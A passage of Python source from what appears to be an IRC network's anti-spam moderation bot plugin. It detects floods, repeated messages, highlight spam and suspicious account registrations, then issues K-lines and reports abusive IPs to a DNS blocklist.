irc.sendMsg(ircmsgs.IrcMsg('KLINE %s %s :%s|%s' % (self.registryValue('klineDuration'),i.toklineresults[nick]['mask'],self.registryValue('klineMessage'),'%s - kline evasion' % (uid))))
self.logChannel(irc,'BAD: [%s] %s (kline evasion)' % (i.toklineresults[nick]['hostmask'],uid))
del i.tokline[nick]
del i.toklineresults[nick]
def doInvite(self, irc, msg):
channel = msg.args[1]
i = self.getIrc(irc)
self.log.info('%s inviting %s in %s (%s | %s | %s)' % (msg.prefix,irc.nick,channel,self.registryValue('leaveChannelIfNoActivity',channel=channel),self.registryValue('lastActionTaken',channel=channel),self.registryValue('minimumUsersInChannel')))
if channel and not channel in irc.state.channels and not ircdb.checkIgnored(msg.prefix):
if self.registryValue('leaveChannelIfNoActivity',channel=channel) == -1:
irc.queueMsg(ircmsgs.join(channel))
self.logChannel(irc,"JOIN: [%s] due to %s's invite" % (channel,msg.prefix))
try:
network = conf.supybot.networks.get(irc.network)
network.channels().add(channel)
except KeyError:
pass
elif self.registryValue('lastActionTaken',channel=channel) > 0.0:
if self.registryValue('minimumUsersInChannel') > -1:
i.invites[channel] = msg.prefix
irc.queueMsg(ircmsgs.IrcMsg('LIST %s' % channel))
else:
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
irc.queueMsg(ircmsgs.join(channel))
self.logChannel(irc,"JOIN: [%s] due to %s's invite" % (channel,msg.prefix))
try:
network = conf.supybot.networks.get(irc.network)
network.channels().add(channel)
except KeyError:
pass
irc.queueMsg(ircmsgs.privmsg(channel,'** Warning: if there is any bot in %s which should be exempted from %s, contact staffers before it gets caught **' % (channel,irc.nick)))
else:
self.logChannel(irc,'INVITE: [%s] %s is asking for %s' % (channel,msg.prefix,irc.nick))
irc.queueMsg(ircmsgs.privmsg(msg.nick,'The invitation to %s will be reviewed by staff' % channel))
def do322 (self,irc,msg):
i = self.getIrc(irc)
if msg.args[1] in i.invites:
if int(msg.args[2]) >= self.registryValue('minimumUsersInChannel'):
self.setRegistryValue('lastActionTaken',time.time(),channel=msg.args[1])
irc.queueMsg(ircmsgs.join(msg.args[1]))
try:
network = conf.supybot.networks.get(irc.network)
network.channels().add(msg.args[1])
except KeyError:
pass
self.logChannel(irc,"JOIN: [%s] due to %s's invite (%s users)" % (msg.args[1],i.invites[msg.args[1]],msg.args[2]))
irc.queueMsg(ircmsgs.privmsg(msg.args[1],'** Warning: if there is any bot in %s which should be exempted from %s, contact staffers before it gets caught **' % (msg.args[1],irc.nick)))
else:
self.logChannel(irc,"INVITE: [%s] by %s denied (%s users)" % (msg.args[1],i.invites[msg.args[1]],msg.args[2]))
(nick,ident,host) = ircutils.splitHostmask(i.invites[msg.args[1]])
irc.queueMsg(ircmsgs.privmsg(nick,'Invitation denied, there are only %s users in %s (%s minimum for %s): contact staffers if needed.' % (msg.args[2],msg.args[1],self.registryValue('minimumUsersInChannel'),irc.nick)))
del i.invites[msg.args[1]]
def resolveSnoopy (self,irc,account,email,badmail,freeze):
resolver = dns.resolver.Resolver()
resolver.timeout = 10
resolver.lifetime = 10
found = None
mxbl = set(self.registryValue('mxbl'))
i = self.getIrc(irc)
if email.lower() in mxbl:
found = email
else:
to_resolve = [(email,'MX'), (email,'A'), (email,'AAAA')]
while to_resolve:
domain, type = to_resolve.pop(0)
try:
res = resolver.query(domain, type)
except:
pass
else:
for record in res:
record = record.to_text()
if type == 'MX':
record = record.split(" ", 1)[1].lower()
# MX records (and their A records) are what we match on most,
# so doing .insert(0, ...) means they're checked first
to_resolve.insert(0, (record, 'A'))
to_resolve.insert(0, (record, 'AAAA'))
if record in mxbl:
found = record
break
if found is not None:
break
if found is not None:
i.mx[account] = [email,badmail,found,freeze]
if badmail and len(email):
irc.queueMsg(ircmsgs.IrcMsg('PRIVMSG NickServ :BADMAIL ADD *@%s %s' % (email,found)))
if not freeze:
irc.queueMsg(ircmsgs.IrcMsg('PRIVMSG NickServ :FDROP %s' % account))
else:
irc.queueMsg(ircmsgs.IrcMsg('PRIVMSG NickServ :FREEZE %s ON changed email to (%s which is in mxbl %s)' % (account,email,found)))
irc.queueMsg(ircmsgs.IrcMsg('WHOIS %s' % account))
else:
i.cleandomains[email] = True
def handleSnoopMessage (self,irc,msg):
(targets, text) = msg.args
text = text.replace('\x02','')
if msg.nick == 'NickServ' and 'REGISTER:' in text:
email = text.split('@')[1]
account = text.split(' ')[0]
i = self.getIrc(irc)
if not email in i.cleandomains:
t = world.SupyThread(target=self.resolveSnoopy,name=format('Snoopy %s', email),args=(irc,account,email,True,False))
t.setDaemon(True)
t.start()
account = account.lower().strip()
q = self.getIrcQueueFor(irc,account,'nsregister',600)
q.enqueue(email)
if msg.nick == 'NickServ':
src = text.split(' ')[0].lower().strip()
target = ''
registering = True
grouping = False
if ' GROUP:' in text:
grouping = True
target = text.split('(')[1].split(')')[0]
elif 'SET:ACCOUNTNAME:' in text:
grouping = True
t = text.split('(')
if len(t) > 1:
target = text.split('(')[1].split(')')[0]
else:
return
elif 'UNGROUP: ' in text:
grouping = True
target = text.split('UNGROUP: ')[1]
if len(target) and grouping:
q = self.getIrcQueueFor(irc,src,'nsAccountGroup',120)
q.enqueue(text)
if len(q) == 3:
index = 0
a = b = c = False
oldAccount = None
for m in q:
if ' GROUP:' in m and index == 0:
a = True
elif ' SET:ACCOUNTNAME:' in m and index == 1:
oldAccount = m.split(' ')[1].replace('(','').replace('(','')
b = True
elif ' UNGROUP:' in m and index == 2:
c = True
index = index + 1
q.reset()
if a and b and c:
self.logChannel(irc,"SERVICE: %s suspicious evades/abuses with GROUP/ACCOUNTNAME/UNGROUP (was %s)" % (src,oldAccount))
i = self.getIrc(irc)
oldAccount = oldAccount.lower().strip()
for u in i.klinednicks:
if u == oldAccount:
self.logChannel(irc,"SERVICE: %s lethaled (%s), enforcing" % (src,oldAccount))
i.klinednicks.enqueue(src)
if not src in i.tokline:
i.toklineresults[src] = {}
i.toklineresults[src]['kind'] = 'evade'
i.tokline[src] = src
def f ():
irc.sendMsg(ircmsgs.IrcMsg('WHOIS %s %s' % (src,src)))
schedule.addEvent(f,time.time()+random.randint(0,7))
break
def do211 (self,irc,msg):
i = self.getIrc(irc)
if msg.args[1].startswith('[unknown@'):
if msg.args[1] in i.stats:
i.stats[msg.args[1]] = i.stats[msg.args[1]] + 1
else:
i.stats[msg.args[1]] = 0
def do728 (self,irc,msg):
i = self.getIrc(irc)
channel = msg.args[1]
value = msg.args[3]
op = msg.args[4]
if self.registryValue('defconMode',channel=channel) and not i.defcon:
if value == '$~a' and op == irc.prefix:
if channel == self.registryValue('mainChannel'):
irc.sendMsg(ircmsgs.IrcMsg('MODE %s -qz $~a' % channel))
else:
irc.sendMsg(ircmsgs.IrcMsg('MODE %s -qzo $~a %s' % (channel,irc.nick)))
def handleMsg (self,irc,msg,isNotice):
if not ircutils.isUserHostmask(msg.prefix):
return
if msg.prefix == irc.prefix:
return
(targets, t) = msg.args
if ircmsgs.isAction(msg):
text = ircmsgs.unAction(msg)
else:
text = t
try:
raw = ircutils.stripFormatting(text)
except:
raw = text
text = raw.lower()
mask = self.prefixToMask(irc,msg.prefix)
i = self.getIrc(irc)
if not i.ping or time.time() - i.ping > self.registryValue('lagInterval'):
i.ping = time.time()
self.cleanup(irc)
if self.registryValue('lagPermit') > -1:
i.stats = {}
if self.registryValue('ghostPermit') > -1:
irc.queueMsg(ircmsgs.IrcMsg('STATS L'))
irc.queueMsg(ircmsgs.IrcMsg('MAP'))
if i.defcon:
if time.time() > i.defcon + self.registryValue('defcon'):
i.lastDefcon = time.time()
i.defcon = False
self.logChannel(irc,"INFO: triggers restored to normal behaviour")
for channel in irc.state.channels:
if irc.isChannel(channel) and self.registryValue('defconMode',channel=channel):
if 'z' in irc.state.channels[channel].modes and irc.nick in list(irc.state.channels[channel].ops) and not 'm' in irc.state.channels[channel].modes:
irc.queueMsg(ircmsgs.IrcMsg('MODE %s q' % channel))
if i.netsplit:
if time.time() > i.netsplit:
i.netsplit = False
self.logChannel(irc,"INFO: netsplit mode deactivated")
if mask in i.klines:
self.log.debug('Ignoring %s (%s) - kline in progress', msg.prefix,mask)
return
isBanned = False
for channel in targets.split(','):
if channel.startswith('@'):
channel = channel.replace('@','',1)
if channel.startswith('+'):
channel = channel.replace('+','',1)
if irc.isChannel(channel) and channel in irc.state.channels:
if self.registryValue('reportChannel') == channel:
self.handleReportMessage(irc,msg)
if self.registryValue('snoopChannel') == channel:
self.handleSnoopMessage(irc,msg)
if self.registryValue('secretChannel') == channel:
self.handleSecretMessage(irc,msg)
if self.registryValue('ignoreChannel',channel):
continue
if ircdb.checkCapability(msg.prefix, 'protected'):
if msg.nick in list(irc.state.channels[channel].ops) and irc.nick in text:
self.logChannel(irc,'OP: [%s] <%s> %s' % (channel,msg.nick,text))
continue
chan = self.getChan(irc,channel)
if chan.called:
if time.time() - chan.called > self.registryValue('abuseDuration',channel=channel):
chan.called = False
if not i.defcon:
self.logChannel(irc,'INFO: [%s] returns to regular state' % channel)
if irc.isChannel(channel) and self.registryValue('defconMode',channel=channel) and not i.defcon:
if 'z' in irc.state.channels[channel].modes and irc.nick in list(irc.state.channels[channel].ops) and not 'm' in irc.state.channels[channel].modes:
irc.queueMsg(ircmsgs.IrcMsg('MODE %s q' % channel))
if isBanned:
continue
if msg.nick in list(irc.state.channels[channel].ops):
if irc.nick in raw:
self.logChannel(irc,'OP: [%s] <%s> %s' % (channel,msg.nick,text))
continue
if self.registryValue('ignoreVoicedUser',channel=channel):
if msg.nick in list(irc.state.channels[channel].voices):
continue
protected = ircdb.makeChannelCapability(channel, 'protected')
if ircdb.checkCapability(msg.prefix, protected):
continue
if self.registryValue('ignoreRegisteredUser',channel=channel):
if msg.nick in chan.nicks and len(chan.nicks[msg.nick]) > 4:
if chan.nicks[msg.nick][4]:
continue
killReason = self.registryValue('killMessage',channel=channel)
if msg.nick in chan.nicks and len(chan.nicks[msg.nick]) > 4:
if chan.nicks[msg.nick][3] == "https://webchat.freenode.net":
hh = mask.split('@')[1]
mask = '*@%s' % hh
flag = ircdb.makeChannelCapability(channel, 'pattern')
if ircdb.checkCapability(msg.prefix, flag):
for k in i.patterns:
pattern = i.patterns[k]
if pattern.match(raw):
if pattern.limit == 0:
isBanned = True
uid = random.randint(0,1000000)
reason = '%s - matches #%s in %s' % (uid,pattern.uid,channel)
log = 'BAD: [%s] %s (matches #%s - %s)' % (channel,msg.prefix,pattern.uid,uid)
self.ban(irc,msg.nick,msg.prefix,mask,self.registryValue('klineDuration'),reason,self.registryValue('klineMessage'),log,killReason)
i.count(self.getDb(irc.network),pattern.uid)
chan.klines.enqueue('%s %s' % (msg.nick.lower(),mask))
self.isAbuseOnChannel(irc,channel,'pattern',mask)
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
break
else:
queue = self.getIrcQueueFor(irc,mask,pattern.uid,pattern.life)
queue.enqueue(text)
if len(queue) > pattern.limit:
isBanned = True
uid = random.randint(0,1000000)
reason = '%s - matches #%s (%s/%ss) in %s' % (uid,pattern.uid,pattern.limit,pattern.life,channel)
log = 'BAD: [%s] %s (matches #%s %s/%ss - %s)' % (channel,msg.prefix,pattern.uid,pattern.limit,pattern.life,uid)
self.ban(irc,msg.nick,msg.prefix,mask,self.registryValue('klineDuration'),reason,self.registryValue('klineMessage'),log,killReason)
self.rmIrcQueueFor(irc,mask)
i.count(self.getDb(irc.network),pattern.uid)
chan.klines.enqueue('%s %s' % (msg.nick.lower(),mask))
self.isAbuseOnChannel(irc,channel,'pattern',mask)
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
break
i.count(self.getDb(irc.network),pattern.uid)
if isBanned:
continue
if i.defcon and self.isChannelUniSpam(irc,msg,channel,mask,text):
isBanned = True
uid = random.randint(0,1000000)
reason = '!dnsbl UniSpam'
log = 'BAD: [%s] %s (%s - %s)' % (channel,msg.prefix,reason,uid)
chan.klines.enqueue('%s %s' % (msg.nick.lower(),mask))
reason = '%s - %s' % (uid,reason)
self.ban(irc,msg.nick,msg.prefix,mask,self.registryValue('klineDuration'),reason,self.registryValue('klineMessage'),log,killReason)
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
i.defcon = time.time()
if isBanned:
continue
ignoreDuration = self.registryValue('ignoreDuration',channel=channel)
if not msg.nick in chan.nicks:
t = time.time()
if isCloaked(msg.prefix,self):
t = t - ignoreDuration - 1
chan.nicks[msg.nick] = [t,msg.prefix,mask]
isIgnored = False
if ignoreDuration > 0:
ts = chan.nicks[msg.nick][0]
if time.time()-ts > ignoreDuration:
isIgnored = True
reason = ''
publicreason = ''
if self.registryValue('joinSpamPartPermit',channel=channel) > -1:
kind = 'joinSpamPart'
life = self.registryValue('joinSpamPartLife',channel=channel)
key = mask
isNew = False
if not kind in chan.buffers:
chan.buffers[kind] = {}
if not key in chan.buffers[kind]:
isNew = True
chan.buffers[kind][key] = utils.structures.TimeoutQueue(life)
elif chan.buffers[kind][key].timeout != life:
chan.buffers[kind][key].setTimeout(life)
chan.buffers[kind][key].enqueue(key)
if not isIgnored and isNew and len(chan.buffers[kind][key]) == 1 and text.startswith('http') and time.time()-chan.nicks[msg.nick][0] < 15 and 'z' in irc.state.channels[channel].modes and channel == '#freenode':
publicreason = 'link spam once joined'
reason = 'linkspam'
badunicode = False
flag = ircdb.makeChannelCapability(channel,'badunicode')
if ircdb.checkCapability(msg.prefix,flag):
badunicode = self.isChannelUnicode(irc,msg,channel,mask,text)
if badunicode and self.hasAbuseOnChannel(irc,channel,'badunicode'):
isIgnored = False
if badunicode:
publicreason = 'unreadable unicode glyphes'
reason = badunicode
hilight = False
flag = ircdb.makeChannelCapability(channel, 'hilight')
if ircdb.checkCapability(msg.prefix, flag):
hilight = self.isChannelHilight(irc,msg,channel,mask,text)
if hilight and self.hasAbuseOnChannel(irc,channel,'hilight'):
isIgnored = False
if hilight:
publicreason = 'nicks/hilight spam'
reason = hilight
if chan.patterns and not len(reason):
for pattern in chan.patterns:
if pattern in text:
isIgnored = False
reason = 'matches tmp pattern in %s' % channel
publicreason = 'your sentence matches temporary blacklisted words'
chan.patterns.enqueue(pattern)
self.isAbuseOnChannel(irc,channel,'pattern',mask)
break
massrepeat = False
flag = ircdb.makeChannelCapability(channel, 'massRepeat')
if ircdb.checkCapability(msg.prefix, flag):
massrepeat = self.isChannelMassRepeat(irc,msg,channel,mask,text)
if massrepeat and self.hasAbuseOnChannel(irc,channel,'massRepeat'):
isIgnored = False
lowmassrepeat = False
flag = ircdb.makeChannelCapability(channel, 'lowMassRepeat')
if ircdb.checkCapability(msg.prefix, flag):
lowmassrepeat = self.isChannelLowMassRepeat(irc,msg,channel,mask,text)
if lowmassrepeat and self.hasAbuseOnChannel(irc,channel,'lowMassRepeat'):
isIgnored = False
repeat = False
flag = ircdb.makeChannelCapability(channel, 'repeat')
if ircdb.checkCapability(msg.prefix, flag):
repeat = self.isChannelRepeat(irc,msg,channel,mask,text)
if repeat and self.hasAbuseOnChannel(irc,channel,'repeat'):
isIgnored = False
lowrepeat = False
flag = ircdb.makeChannelCapability(channel, 'lowRepeat')
if ircdb.checkCapability(msg.prefix, flag):
lowrepeat = self.isChannelLowRepeat(irc,msg,channel,mask,text)
if lowrepeat and self.hasAbuseOnChannel(irc,channel,'lowRepeat'):
isIgnored = False
lowhilight = False
flag = ircdb.makeChannelCapability(channel, 'lowHilight')
if ircdb.checkCapability(msg.prefix, flag):
lowhilight = self.isChannelLowHilight(irc,msg,channel,mask,text)
if lowhilight and self.hasAbuseOnChannel(irc,channel,'lowHilight'):
isIgnored = False
flood = False
flag = ircdb.makeChannelCapability(channel, 'flood')
if ircdb.checkCapability(msg.prefix, flag):
flood = self.isChannelFlood(irc,msg,channel,mask,text)
if flood and self.hasAbuseOnChannel(irc,channel,'flood'):
isIgnored = False
lowflood = False
flag = ircdb.makeChannelCapability(channel, 'lowFlood')
if ircdb.checkCapability(msg.prefix, flag):
lowflood = self.isChannelLowFlood(irc,msg,channel,mask,text)
if lowflood and self.hasAbuseOnChannel(irc,channel,'lowFlood'):
isIgnored = False
ctcp = False
flag = ircdb.makeChannelCapability(channel, 'ctcp')
if ircdb.checkCapability(msg.prefix, flag):
if not ircmsgs.isAction(msg) and ircmsgs.isCtcp(msg):
ctcp = self.isChannelCtcp(irc,msg,channel,mask,text)
if ctcp and self.hasAbuseOnChannel(irc,channel,'ctcp'):
isIgnored = False
notice = False
flag = ircdb.makeChannelCapability(channel, 'notice')
if ircdb.checkCapability(msg.prefix, flag):
if not ircmsgs.isAction(msg) and isNotice:
notice = self.isChannelNotice(irc,msg,channel,mask,text)
if notice and self.hasAbuseOnChannel(irc,channel,'notice'):
isIgnored = False
cap = False
flag = ircdb.makeChannelCapability(channel, 'cap')
if ircdb.checkCapability(msg.prefix, flag):
cap = self.isChannelCap(irc,msg,channel,mask,raw)
if cap and self.hasAbuseOnChannel(irc,channel,'cap'):
isIgnored = False
if not reason:
if massrepeat:
reason = massrepeat
publicreason = 'repetition detected'
elif lowmassrepeat:
reason = lowmassrepeat
publicreason = 'repetition detected'
elif repeat:
reason = repeat
publicreason = 'repetition detected'
elif lowrepeat:
reason = lowrepeat
publicreason = 'repetition detected'
elif hilight:
reason = hilight
publicreason = 'nicks/hilight spam'
elif lowhilight:
reason = lowhilight
publicreason = 'nicks/hilight spam'
elif cap:
reason = cap
publicreason = 'uppercase detected'
elif flood:
reason = flood
publicreason = 'flood detected'
elif lowflood:
reason = lowflood
publicreason = 'flood detected'
elif ctcp:
reason = ctcp
publicreason = 'channel CTCP'
elif notice:
reason = notice
publicreason = 'channel notice'
if reason:
if isIgnored:
if self.warnedOnOtherChannel(irc,channel,mask):
isIgnored = False
elif self.isBadOnChannel(irc,channel,'bypassIgnore',mask):
isIgnored = False
if chan.called:
isIgnored = False
if isIgnored:
bypassIgnore = self.isBadOnChannel(irc,channel,'bypassIgnore',mask)
if bypassIgnore:
isBanned = True
uid = random.randint(0,1000000)
reason = '%s %s' % (reason,bypassIgnore)
log = 'BAD: [%s] %s (%s - %s)' % (channel,msg.prefix,reason,uid)
chan.klines.enqueue('%s %s' % (msg.nick.lower(),mask))
reason = '%s - %s' % (uid,reason)
self.ban(irc,msg.nick,msg.prefix,mask,self.registryValue('klineDuration'),reason,self.registryValue('klineMessage'),log,killReason)
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
if i.defcon:
i.defcon = time.time()
else:
q = self.getIrcQueueFor(irc,mask,'warned-%s' % channel,self.registryValue('alertPeriod'))
if len(q) == 0:
q.enqueue(text)
self.logChannel(irc,'IGNORED: [%s] %s (%s)' % (channel,msg.prefix,reason))
matter = None
if msg.nick:
irc.queueMsg(ircmsgs.notice(msg.nick,"Your actions in %s tripped automated anti-spam measures (%s), but were ignored based on your time in channel. Stop now, or automated action will still be taken. If you have any questions, please don't hesitate to contact a member of staff" % (channel,publicreason)))
else:
isBanned = True
uid = random.randint(0,1000000)
log = 'BAD: [%s] %s (%s - %s)' % (channel,msg.prefix,reason,uid)
chan.klines.enqueue('%s %s' % (msg.nick.lower(),mask))
reason = '%s - %s' % (uid,reason)
self.ban(irc,msg.nick,msg.prefix,mask,self.registryValue('klineDuration'),reason,self.registryValue('klineMessage'),log,killReason)
if i.defcon:
i.defcon = time.time()
if chan.called:
chan.called = time.time()
if i.lastDefcon and time.time()-i.lastDefcon < self.registryValue('alertPeriod') and not i.defcon:
self.logChannel(irc,"INFO: ignores lifted and abuses end to klines for %ss due to abuses in %s after lastest defcon %s" % (self.registryValue('defcon')*2,channel,i.lastDefcon))
i.defcon = time.time() + (self.registryValue('defcon')*2)
if not i.god:
irc.sendMsg(ircmsgs.IrcMsg('MODE %s +p' % irc.nick))
else:
self.applyDefcon(irc)
ip = mask.split('@')[1]
if hilight and i.defcon:
if utils.net.bruteIsIPV6(ip) or utils.net.isIPV4(ip):
if len(self.registryValue('droneblKey')) and len(self.registryValue('droneblHost')) and self.registryValue('enable'):
t = world.SupyThread(target=self.fillDnsbl,name=format('fillDnsbl %s', ip),args=(irc,ip,self.registryValue('droneblHost'),self.registryValue('droneblKey'),reason))
t.setDaemon(True)
t.start()
self.setRegistryValue('lastActionTaken',time.time(),channel=channel)
if not isBanned:
mini = self.registryValue('amsgMinimum')
if len(text) > mini or text.find('http') != -1:
limit = self.registryValue('amsgPermit')
if limit > -1:
life = self.registryValue('amsgLife')
percent = self.registryValue('amsgPercent')
queue = self.getIrcQueueFor(irc,mask,channel,life)
queue.enqueue(text)
found = None
for ch in i.channels:
chc = self.getChan(irc,ch)
if msg.nick in chc.nicks and ch != channel:
queue = self.getIrcQueueFor(irc,mask,ch,life)
for m in queue:
if compareString(m,text) > percent:
found = ch
break
if found:
break
if found:
queue = self.getIrcQueueFor(irc,mask,'amsg',life)
flag = False
for q in queue:
if found in q:
flag = True
break
if not flag:
queue.enqueue(found)
if len(queue) > limit:
chs = list(queue)
queue.reset()
key = 'amsg %s' % mask
q = self.getIrcQueueFor(irc,key,'amsg',self.registryValue('alertPeriod'))
if len(q) == 0:
q.enqueue(mask)
chs.append(channel)
self.logChannel(irc,'AMSG: %s (%s) in %s' % (msg.nick,text,', '.join(chs)))
for channel in i.channels:
chan = self.getChan(irc,channel)
life = self.registryValue('computedPatternLife',channel=channel)
if not chan.patterns:
chan.patterns = utils.structures.TimeoutQueue(life)
elif chan.patterns.timeout != life:
chan.patterns.setTimeout(life)
chan.patterns.enqueue(text.lower())
def handleSecretMessage (self,irc,msg):
(targets, text) = msg.args
nicks = ['OperServ','NickServ']
i = self.getIrc(irc)
if msg.nick in nicks:
if text.startswith('klinechan_check_join(): klining '):
patterns = self.registryValue('droneblPatterns')
found = False
if len(patterns):
for pattern in patterns:
if len(pattern) and pattern in text:
found = pattern
break
if found:
a = text.split('klinechan_check_join(): klining ')[1].split(' ')
a = a[0]
ip = a.split('@')[1]
if utils.net.isIPV4(ip) or utils.net.bruteIsIPV6(ip):
if len(self.registryValue('droneblKey')) and len(self.registryValue('droneblHost')) and self.registryValue('enable'):
t = world.SupyThread(target=self.fillDnsbl,name=format('fillDnsbl %s', ip),args=(irc,ip,self.registryValue('droneblHost'),self.registryValue('droneblKey'),found))
t.setDaemon(True)
t.start()
else:
self.prefixToMask(irc,'*!*@%s' % ip,'',True)
if text.startswith('sendemail():') and self.registryValue('registerPermit') > 0:
text = text.replace('sendemail():','')
pattern = r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'
result = re.search(pattern,text)
email = text.split('<')[1].split('>')[0]
h = text.split('email for ')[1].split(']')[0].strip().replace('[','!')
if result:
ip = result.group(0)
if ip and 'type register to' in text:
q = self.getIrcQueueFor(irc,ip,'register',self.registryValue('registerLife'))
q.enqueue(email)
if len(q) > self.registryValue('registerPermit'):
ms = []
for m in q:
ms.append(m)
if i.defcon:
uid = random.randint(0,1000000)
m = self.prefixToMask(irc,h)
self.ban(irc,nick,h,m,self.registryValue('klineDuration'),'%s - services load with %s' % (uid,','.join(ms)),self.registryValue('klineMessage'),'BAD: %s (registered load of accounts - %s)' % (h,uid))
else:
self.logChannel(irc,'SERVICE: %s load of accounts %s' % (h,', '.join(ms)))
if 'type register to' in text:
q = self.getIrcQueueFor(irc,email,'register',self.registryValue('registerLife'))
text = text.replace('email for ','')
text = text.split(' type register')[0]
q.enqueue(text.strip())
if len(q) > self.registryValue('registerPermit'):
ms = []
for m in q:
ms.append(q)
self.logChannel(irc,'SERVICE: loads of registration to %s (%s)' % (email,', '.join(ms)))
if 'AKICK:ADD:' in text or 'AKICK:DEL:' in text:
life = self.registryValue('decloakLife')
limit = self.registryValue('decloakPermit')
if limit > -1:
origin = text.split(' ')[0]
target = text.split(' ').pop()
q = self.getIrcQueueFor(irc,origin,target,life)
q.enqueue(text)
if len(q) > limit:
q.reset()
self.logChannel(irc,'SERVICE: [%s] %s suspicious AKICK behaviour' % (target,origin))
if 'VERIFY:EMAILCHG:' in text:
account = text.split(' VERIFY:EMAILCHG')[0]
email = text.split('(email: ')[1].split(')')[0].split('@')[1]
t = world.SupyThread(target=self.resolveSnoopy,name=format('Snoopy %s', email),args=(irc,account,email,True,True))
t.setDaemon(True)
t.start()
def handleReportMessage (self,irc,msg):
(targets, text) = msg.args
nicks = self.registryValue('reportNicks')
if msg.nick in nicks:
i = self.getIrc(irc)
if text.startswith('BAD:') and not '(tor' in text and '(' in text:
permit = self.registryValue('reportPermit')
if permit > -1:
life = self.registryValue('reportLife')
queue = self.getIrcQueueFor(irc,'report','bad',life)
target = text.split('(')[0]
if len(text.split(' ')) > 1:
target = text.split(' ')[1]
found = False
for q in queue:
if q == target:
found = True
break
if not found:
queue.enqueue(target)
if len(queue) > permit:
queue.reset()
if not i.defcon:
self.logChannel(irc,"BOT: Wave in progress (%s/%ss), ignores lifted, triggers thresholds lowered for %ss at least" % (self.registryValue('reportPermit'),self.registryValue('reportLife'),self.registryValue('defcon')))
i.defcon = time.time()
if not i.god:
irc.sendMsg(ircmsgs.IrcMsg('MODE %s +p' % irc.nick))
else:
self.applyDefcon (irc)
i.defcon = time.time()
else:
if i.netsplit and text.startswith('Join rate in '):
i.netsplit = time.time() + self.registryValue('netsplitDuration')
if text.startswith('Client ') and 'suspicious' in text and i.defcon:
text = text.replace('Client ','')
hostmask = text.split(' ')[0].replace('(','!').replace(')','')
if ircutils.isUserHostmask(hostmask):
mask = self.prefixToMask(irc,hostmask)
(nick,ident,host) = ircutils.splitHostmask(hostmask)
patterns = self.registryValue('droneblPatterns')
found = False
if len(patterns):
for pattern in patterns:
if len(pattern) and pattern in text:
found = pattern
break
if found:
def k():
self.kline(irc,hostmask,mask,self.registryValue('klineDuration'),'!dnsbl (%s in suspicious mask)' % found)
schedule.addEvent(k,time.time()+random.uniform(1, 6))
if text.startswith('Killing client ') and 'due to lethal mask ' in text:
patterns = self.registryValue('droneblPatterns')
found = False
if len(patterns):
for pattern in patterns:
if len(pattern) and pattern in text:
found = pattern
break
if found:
a = text.split('Killing client ')[1]
a = a.split(')')[0]
ip = a.split('@')[1]
if utils.net.isIPV4(ip) or utils.net.bruteIsIPV6(ip):
if len(self.registryValue('droneblKey')) and len(self.registryValue('droneblHost')) and self.registryValue('enable'):
t = world.SupyThread(target=self.fillDnsbl,name=format('fillDnsbl %s', ip),args=(irc,ip,self.registryValue('droneblHost'),self.registryValue('droneblKey'),found))
t.setDaemon(True)
t.start()
else:
self.prefixToMask(irc,'*!*@%s' % ip,'',True,found)
def doPrivmsg (self,irc,msg):
self.handleMsg(irc,msg,False)
try:
i = self.getIrc(irc)
mask = self.prefixToMask(irc,msg.prefix)
(targets, text) = msg.args
text = text
if ircdb.checkCapability(msg.prefix, 'protected'):
return
for channel in targets.split(','):
if channel.startswith('@'):
channel = channel.replace('@','',1)
if channel.startswith('+'):
channel = channel.replace('+','',1)
if not irc.isChannel(channel) and channel == irc.nick:
killReason = self.registryValue('killMessage',channel=channel)
for k in i.patterns:
pattern = i.patterns[k]
if pattern.match(text):
if pattern.limit == 0:
uid = random.randint(0,1000000)
reason = '%s - matches #%s in pm' % (pattern.uid,uid)
log = 'BAD: [%s] %s (matches #%s - %s)' % (channel,msg.prefix,pattern.uid,uid)
self.ban(irc,msg.nick,msg.prefix,mask,self.registryValue('klineDuration'),reason,self.registryValue('klineMessage'),log,killReason)
i.count(self.getDb(irc.network),pattern.uid)
break
else:
queue = self.getIrcQueueFor(irc,mask,pattern.uid,pattern.life)
queue.enqueue(text)
if len(queue) > pattern.limit:
uid = random.randint(0,1000000)
reason = '%s - matches #%s (%s/%ss) in pm' % (pattern.uid,pattern.limit,pattern.life,uid)
log = 'BAD: [%s] %s (matches #%s %s/%ss - %s)' % (channel,msg.prefix,pattern.uid,pattern.limit,pattern.life,uid)
self.ban(irc,msg.nick,msg.prefix,mask,self.registryValue('klineDuration'),reason,self.registryValue('klineMessage'),log,killReason)
self.rmIrcQueueFor(irc,mask)
i.count(self.getDb(irc.network),pattern.uid)
break
i.count(self.getDb(irc.network),pattern.uid)
except:
return
def doTopic(self, irc, msg):
self.handleMsg(irc,msg,False)
def do903 (self,irc,msg):
irc.queueMsg(ircmsgs.IrcMsg('CAP REQ :extended-join account-notify'))
def handleFloodSnote (self,irc,text):
user = text.split('Possible Flooder ')[1]
a = user[::-1]
ar = a.split(']',1)
ar.reverse()
ar.pop()
user = "%s" % ar[0]
user = user.replace('[','!',1)
user = '%s' % user[::-1]
if not ircutils.isUserHostmask(user):
return
target = text.split('target: ')[1]
i = self.getIrc(irc)
if irc.isChannel(target):
limit = self.registryValue('channelFloodPermit')
life = self.registryValue('channelFloodLife')
key = 'snoteFloodAlerted'
if limit > -1:
if not self.registryValue('ignoreChannel',target):
protected = ircdb.makeChannelCapability(target, 'protected')
if not ircdb.checkCapability(user, protected):
queue = self.getIrcQueueFor(irc,target,'snoteFlood',life)
if i.defcon:
if limit > 0:
limit = limit - 1
stored = False
for u in queue:
if u == user:
stored = True
break
if not stored:
queue.enqueue(user)
users = list(queue)
if len(queue) > limit:
self.logChannel(irc,'NOTE: [%s] is flooded by %s' % (target,', '.join(users)))
queue.reset()
queue = self.getIrcQueueFor(irc,target,'snoteFloodJoin',life)
queue.enqueue(text)
if len(queue) > 1 or i.defcon:
if self.registryValue('lastActionTaken',channel=target) > 0.0 and not target in irc.state.channels:
for user in users:
if not 'gateway/web/' in user:
mask = self.prefixToMask(irc,user)
uid = random.randint(0,1000000)
self.kline(irc,user,mask,self.registryValue('klineDuration'),'%s - snote flood on %s' % (uid,target))
self.logChannel(irc,"BAD: %s (snote flood on %s - %s)" % (user,target,uid))
t = time.time() - (self.registryValue('leaveChannelIfNoActivity',channel=target) * 24 * 3600) + 1800
self.setRegistryValue('lastActionTaken',t,channel=target)
